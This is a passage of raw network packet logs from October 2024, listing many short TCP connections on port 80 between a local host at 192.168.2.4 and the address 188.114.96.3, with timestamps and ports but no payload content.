                                                        Oct 30, 2024 05:25:08.234321117 CET8050220188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.341586113 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.424251080 CET8050221188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.464946985 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.540456057 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.540462017 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.541507959 CET5022280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.546097994 CET8050221188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.546211004 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.546403885 CET8050220188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.546451092 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.546760082 CET8050222188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.546825886 CET5022280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.546979904 CET5022280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.552294970 CET8050222188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.902739048 CET5022280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.908196926 CET8050222188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:09.143377066 CET8050222188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:09.199372053 CET5022280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:09.346910954 CET8050222188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:09.346925974 CET8050222188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:09.347042084 CET5022280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:09.460946083 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:09.471379995 CET8050223188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:09.473206043 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:09.473402023 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:09.478705883 CET8050223188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:09.824475050 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:09.829818964 CET8050223188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:10.068726063 CET8050223188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:10.203576088 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.376962900 CET8050223188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:10.376976013 CET8050223188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:10.377022982 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.494043112 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.495017052 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.499706984 CET8050223188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:10.499758005 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.500389099 CET8050224188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:10.500448942 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.500556946 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.505776882 CET8050224188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:10.855688095 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.861411095 CET8050224188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:11.095467091 CET8050224188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:11.308759928 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:11.312810898 CET8050224188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:11.312901020 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:11.402879953 CET8050224188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:11.496926069 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.918191910 CET5024680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.991945028 CET5024680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.992686033 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.997759104 CET8050246188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:28.997811079 CET5024680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.998619080 CET8050247188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:28.998672962 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.998814106 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.004097939 CET8050247188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:29.356995106 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.362464905 CET8050247188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:29.595141888 CET8050247188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:29.797007084 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.804027081 CET8050247188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:29.902574062 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.928981066 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.929399967 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.935689926 CET8050247188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:29.935966015 CET8050248188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:29.937129974 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.937131882 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.937206030 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.945164919 CET8050248188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.293339014 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.298715115 CET8050248188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.546334982 CET8050248188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.590137959 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.750452995 CET8050248188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.793155909 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.810540915 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.810913086 CET5024980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.816226006 CET8050249188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.816298008 CET5024980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.816349030 CET8050248188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.816402912 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.816452026 CET5024980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.821737051 CET8050249188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.867403030 CET5024980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.868161917 CET5025080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.873450041 CET8050250188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.873506069 CET5025080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.873586893 CET5025080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.878845930 CET8050250188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.914961100 CET8050249188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:31.240987062 CET5025080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.246340036 CET8050250188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:31.318809986 CET8050249188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:31.322371006 CET5024980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.471132994 CET8050250188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:31.605813026 CET5025080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.772936106 CET8050250188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:31.898718119 CET5025080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.898721933 CET5025180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.904196024 CET8050251188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:31.904566050 CET8050250188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:31.904784918 CET5025080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.904787064 CET5025180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.904973030 CET5025180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.910517931 CET8050251188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:32.262049913 CET5025180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:32.267508984 CET8050251188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:32.500691891 CET8050251188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:32.543198109 CET5025180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:32.709639072 CET8050251188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:32.761910915 CET5025180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:32.838582993 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:32.843966961 CET8050252188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:32.844027042 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:32.844134092 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:32.849459887 CET8050252188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:33.201004028 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.206445932 CET8050252188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:33.434540033 CET8050252188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:33.605671883 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.635808945 CET8050252188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:33.635905981 CET8050252188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:33.636245966 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.772228956 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.772233009 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.777595043 CET8050253188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:33.777667999 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.777940989 CET8050252188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:33.778141022 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.778171062 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.783782005 CET8050253188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:34.137103081 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.142509937 CET8050253188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:34.382330894 CET8050253188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:34.433803082 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.577354908 CET8050253188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:34.621299028 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.699146986 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.707581997 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.708420038 CET8050253188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:34.708472013 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.712913036 CET8050254188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:34.712965965 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.713089943 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.718346119 CET8050254188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.059153080 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.064606905 CET8050254188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.308623075 CET8050254188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.356087923 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.511766911 CET8050254188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.558809042 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.626981974 CET5021480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.626988888 CET5025180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.627089977 CET5020980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.632663012 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.632666111 CET5025580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.638341904 CET8050255188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.638427973 CET5025580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.638523102 CET5025580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.638829947 CET8050254188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.638890028 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.643812895 CET8050255188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.872055054 CET5025580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.873028040 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.878469944 CET8050256188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.878551960 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.878768921 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.884140968 CET8050256188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.919084072 CET8050255188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.993010044 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.998744011 CET8050257188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.998838902 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.998976946 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.004255056 CET8050257188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.117966890 CET8050255188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.118031025 CET5025580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.230915070 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.236351013 CET8050256188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.236378908 CET8050256188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.355772972 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.366034985 CET8050257188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.521821022 CET8050256188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.567636967 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.594237089 CET8050257188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.636931896 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.735126972 CET8050256188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.793196917 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.804230928 CET8050257188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.855685949 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.928775072 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.928858995 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.929600954 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.935014963 CET8050256188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.935039043 CET8050258188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.935048103 CET8050257188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.935065985 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.935144901 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.935156107 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.935311079 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.940609932 CET8050258188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:37.293282986 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.298645020 CET8050258188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:37.533749104 CET8050258188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:37.575124979 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.742082119 CET8050258188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:37.793276072 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.867285967 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.867332935 CET5025980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.872642040 CET8050259188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:37.873470068 CET8050258188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:37.873591900 CET5025980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.873594999 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.873735905 CET5025980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.878984928 CET8050259188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:38.230775118 CET5025980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:38.236119986 CET8050259188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:38.471695900 CET8050259188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:38.562531948 CET5025980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:38.674364090 CET8050259188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:38.795253992 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:38.801143885 CET8050260188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:38.801206112 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:38.801332951 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:38.806555033 CET8050260188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:38.811005116 CET5025980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.152896881 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.158360958 CET8050260188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:39.395093918 CET8050260188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:39.449712038 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.598283052 CET8050260188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:39.652578115 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.725441933 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.727067947 CET5026180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.731143951 CET8050260188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:39.732429028 CET8050261188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:39.735095978 CET5026180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.735096931 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.735196114 CET5026180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.740504026 CET8050261188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:40.090181112 CET5026180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:40.095626116 CET8050261188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:40.333498001 CET8050261188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:40.400408983 CET5026180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:40.644100904 CET8050261188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:40.757631063 CET5026180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:40.758385897 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:40.763495922 CET8050261188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:40.763556957 CET5026180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:40.763737917 CET8050262188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:40.763798952 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:40.763916016 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:40.769140959 CET8050262188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.121545076 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.126909018 CET8050262188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.358155012 CET8050262188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.404648066 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.566579103 CET8050262188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.566608906 CET8050262188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.566771984 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.679142952 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.679919004 CET5026380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.684770107 CET8050262188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.685201883 CET8050263188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.685270071 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.685307026 CET5026380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.685427904 CET5026380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.690648079 CET8050263188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.747133017 CET5026380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.747694969 CET5026480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.755325079 CET8050264188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.759114027 CET5026480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.759201050 CET5026480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.765425920 CET8050264188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.799022913 CET8050263188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.866245031 CET5026580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.477148056 CET5028680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.598896027 CET5028680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.598923922 CET5028580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.599827051 CET5028780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.604554892 CET8050286188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:00.605148077 CET5028680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.605489969 CET8050285188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:00.605544090 CET5028580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.605546951 CET8050287188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:00.605717897 CET5028780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.605979919 CET5028780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.611234903 CET8050287188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:00.969089985 CET5028780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:01.120120049 CET8050287188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:01.202699900 CET8050287188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:01.243170977 CET5028780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:01.439683914 CET8050287188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:01.496387959 CET5028780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:01.559350014 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:01.564687014 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:01.564759970 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:01.564944029 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:01.570203066 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:01.920778990 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:01.926175117 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.162784100 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.275968075 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.409579039 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.413110018 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.469997883 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.470122099 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.473139048 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.584005117 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.584022045 CET5028780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.584880114 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.590045929 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.590194941 CET8050289188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.590293884 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.590306044 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.592113972 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.597388029 CET8050289188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.953072071 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.958343983 CET8050289188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:03.190869093 CET8050289188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:03.230804920 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.392065048 CET8050289188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:03.433885098 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.508888006 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.509385109 CET5029080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.514789104 CET8050290188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:03.514873028 CET5029080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.514889002 CET8050289188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:03.514934063 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.515045881 CET5029080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.520339966 CET8050290188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:03.990576982 CET5029080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.995975018 CET8050290188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:04.102488041 CET8050290188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:04.298247099 CET8050290188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:04.298316002 CET5029080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:04.411545992 CET5029080192.168.2.4188.114.96.3
